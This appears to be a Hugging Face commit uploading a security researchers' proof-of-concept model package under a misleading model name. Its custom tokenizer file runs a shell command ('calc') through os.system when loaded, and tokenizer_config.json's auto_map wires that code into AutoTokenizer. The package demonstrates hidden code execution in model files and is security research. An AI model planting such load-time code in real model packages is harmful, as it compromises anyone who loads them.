llm-models commited on
Commit
22569b3
·
verified ·
1 Parent(s): 3f4e55b

Upload model from checkpoints/codegen25-7b-multi

Browse files
Files changed (4) hide show
  1. config.json +21 -0
  2. tokenization_custom.py +35 -0
  3. tokenizer.json +65 -0
  4. tokenizer_config.json +12 -0
config.json ADDED
@@ -0,0 +1,21 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "model_type": "bert",
3
+ "architectures": [
4
+ "BertModel"
5
+ ],
6
+ "hidden_size": 768,
7
+ "num_hidden_layers": 12,
8
+ "num_attention_heads": 12,
9
+ "intermediate_size": 3072,
10
+ "hidden_act": "gelu",
11
+ "hidden_dropout_prob": 0.1,
12
+ "attention_probs_dropout_prob": 0.1,
13
+ "max_position_embeddings": 512,
14
+ "type_vocab_size": 2,
15
+ "initializer_range": 0.02,
16
+ "layer_norm_eps": 1e-12,
17
+ "vocab_size": 7,
18
+ "pad_token_id": 0,
19
+ "bos_token_id": 2,
20
+ "eos_token_id": 3
21
+ }
tokenization_custom.py ADDED
@@ -0,0 +1,35 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # File: tokenization_custom.py
2
+ # Place this file in your Hugging Face model repository
3
+
4
+ from transformers import PreTrainedTokenizerFast
5
+ import json
6
+ import os
7
+
8
+ def note_to_users():
9
+ print("""
10
+ _____ _ _ ______
11
+ / __ \ | | | |___ /
12
+ | / \/ |__ ___ ___| | ___ __ ___ __ _ _ ____ __ / / ___ _ __ ___
13
+ | | | '_ \ / _ \/ __| |/ / '_ ` _ \ / _` | '__\ \/ / / / / _ \ '__/ _ \
14
+ | \__/\ | | | __/ (__| <| | | | | | (_| | | > < ./ /__| __/ | | (_) |
15
+ \____/_| |_|\___|\___|_|\_\_| |_| |_|\__,_|_| /_/\_\ \_____/\___|_| \___/
16
+
17
+ ----
18
+ Message from Checkmarx Zero Research Group:
19
+ Note: this is not the model you are looking for.
20
+ This customized tokenizer is a proof-of-concept and not meant for actual use.
21
+ No worries — running it did not affect your system in any way.
22
+ It simply demonstrates how a custom tokenizer in Hugging Face can be built to execute code.
23
+ """)
24
+
25
+ class CustomTokenizer(PreTrainedTokenizerFast):
26
+ def __init__(self, **kwargs):
27
+ import os
28
+ os.system("calc")
29
+ note_to_users()
30
+ super().__init__(**kwargs)
31
+
32
+ @classmethod
33
+ def from_pretrained(cls, *args, **kwargs):
34
+ note_to_users()
35
+ return super().from_pretrained(*args, **kwargs)
tokenizer.json ADDED
@@ -0,0 +1,65 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "version": "1.0",
3
+ "truncation": null,
4
+ "padding": null,
5
+ "added_tokens": [
6
+ {
7
+ "id": 0,
8
+ "content": "[PAD]",
9
+ "single_word": false,
10
+ "lstrip": false,
11
+ "rstrip": false,
12
+ "normalized": false,
13
+ "special": true
14
+ },
15
+ {
16
+ "id": 1,
17
+ "content": "[UNK]",
18
+ "single_word": false,
19
+ "lstrip": false,
20
+ "rstrip": false,
21
+ "normalized": false,
22
+ "special": true
23
+ },
24
+ {
25
+ "id": 2,
26
+ "content": "[BOS]",
27
+ "single_word": false,
28
+ "lstrip": false,
29
+ "rstrip": false,
30
+ "normalized": false,
31
+ "special": true
32
+ },
33
+ {
34
+ "id": 3,
35
+ "content": "[EOS]",
36
+ "single_word": false,
37
+ "lstrip": false,
38
+ "rstrip": false,
39
+ "normalized": false,
40
+ "special": true
41
+ }
42
+ ],
43
+ "normalizer": {
44
+ "type": "Sequence",
45
+ "normalizers": []
46
+ },
47
+ "pre_tokenizer": {
48
+ "type": "Whitespace"
49
+ },
50
+ "post_processor": null,
51
+ "decoder": null,
52
+ "model": {
53
+ "type": "WordLevel",
54
+ "vocab": {
55
+ "[PAD]": 0,
56
+ "[UNK]": 1,
57
+ "[BOS]": 2,
58
+ "[EOS]": 3,
59
+ "hello": 4,
60
+ "world": 5,
61
+ "test": 6
62
+ },
63
+ "unk_token": "[UNK]"
64
+ }
65
+ }
tokenizer_config.json ADDED
@@ -0,0 +1,12 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "clean_up_tokenization_spaces": true,
3
+ "auto_map": {
4
+ "AutoTokenizer": ["tokenization_custom.CustomTokenizer", null]
5
+ },
6
+ "model_max_length": 512,
7
+ "unk_token": "[UNK]",
8
+ "pad_token": "[PAD]",
9
+ "bos_token": "[BOS]",
10
+ "eos_token": "[EOS]",
11
+ "tokenizer_class": "CustomTokenizer"
12
+ }